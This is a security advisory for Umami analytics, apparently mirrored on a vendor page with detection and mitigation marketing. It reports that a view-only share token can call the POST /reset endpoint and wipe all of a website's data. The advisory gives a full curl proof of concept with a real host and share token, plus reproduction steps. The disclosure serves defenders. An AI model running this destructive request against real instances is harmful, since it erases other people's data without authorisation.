GHSA-8www-cffh-4q98
CRITICALAnyone with a share link can RESET all website data in Umami
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
umaminpmDescription
Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a /share/ URL, he receives a share token which is used for authentication. This token is later verified by useAuth. After the token is verified, the user can call most of the GET APIs that allow fetching stats about a website.
The POST /reset endpoint is secured using canViewWebsite which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - permalink
PoC
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
-H 'authority: analytics.umami.is' \
-H 'accept: application/json' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'authorization: Bearer undefined' \
-H 'cache-control: no-cache' \
-H 'content-type: application/json' \
-H 'pragma: no-cache' \
-H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
-H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
-H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
--compressed
You can reproduce this by:
- Accessing a website using it's share link
- Copy the
tokenreceived from the the received from theGET /share/{website-id} - Send a POST request to
https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/resetwithx-umami-share-token:header equal to the token copied in the previous step - The website data is now cleared
Impact
Everyone with an open share link exposed to the internet!
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | umami | all versions | 2.3.1 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for umami. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update umami to 2.3.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8www-cffh-4q98 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-8www-cffh-4q98 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-8www-cffh-4q98. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-8www-cffh-4q98 in your dependencies?
O3 detects GHSA-8www-cffh-4q98 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.